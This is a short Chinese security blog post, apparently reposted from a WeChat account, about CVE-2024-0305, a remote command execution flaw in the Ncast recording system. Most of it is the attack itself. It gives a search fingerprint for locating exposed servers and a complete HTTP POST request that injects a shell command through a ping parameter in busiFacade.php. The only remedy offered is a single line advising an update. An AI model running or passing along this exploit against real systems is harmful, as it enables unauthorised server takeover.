叮～你有新的速递！CVE-2024-0305 RCE漏洞（附EXP）

admin

102737
文章

87
评论

2024年1月21日15:21:11评论23 views字数 686阅读2分17秒阅读模式

叮～你有新的速递！CVE-2024-0305 RCE漏洞（附EXP）

0x01 前言

Ncast盈可视高清智能录播系统存在RCE漏洞，攻击者可以利用此漏洞执行任意命令，执行任意命令，通过该漏洞可以获取服务器权限。

0x02 影响平台

Ncast 平台

0x03 漏洞复现

搜索语法

icon_hash="-1253433910"

页面是这个酱紫

叮～你有新的速递！CVE-2024-0305 RCE漏洞（附EXP）

EXP如下：

POST /classes/common/busiFacade.php HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: closeContent-Length: 98Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequest{"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["ping 127.0.0.1 | id"]}

Success~

叮～你有新的速递！CVE-2024-0305 RCE漏洞（附EXP）

0x04 修复方案

建议及时更新至最新版本！

原文始发于微信公众号（哪都通安全）：叮～你有新的速递！CVE-2024-0305 RCE漏洞（附EXP）

左青龙
微信扫一扫

右白虎
微信扫一扫

叮～你有新的速递！CVE-2024-0305 RCE漏洞（附EXP）

CVE-2024-23722

CVE-2024-0783

CNVD-2024-06148

CVE-2024-4040｜CrushFTP 认证绕过模板注入漏洞（POC）

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263）

（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

漏洞预警 | 大华智慧园区综合管理平台远程代码执行漏洞

漏洞预警 | JeecgBoot任意文件上传漏洞

漏洞预警 | 若依druid未授权访问漏洞

发表评论

在线咨询

微信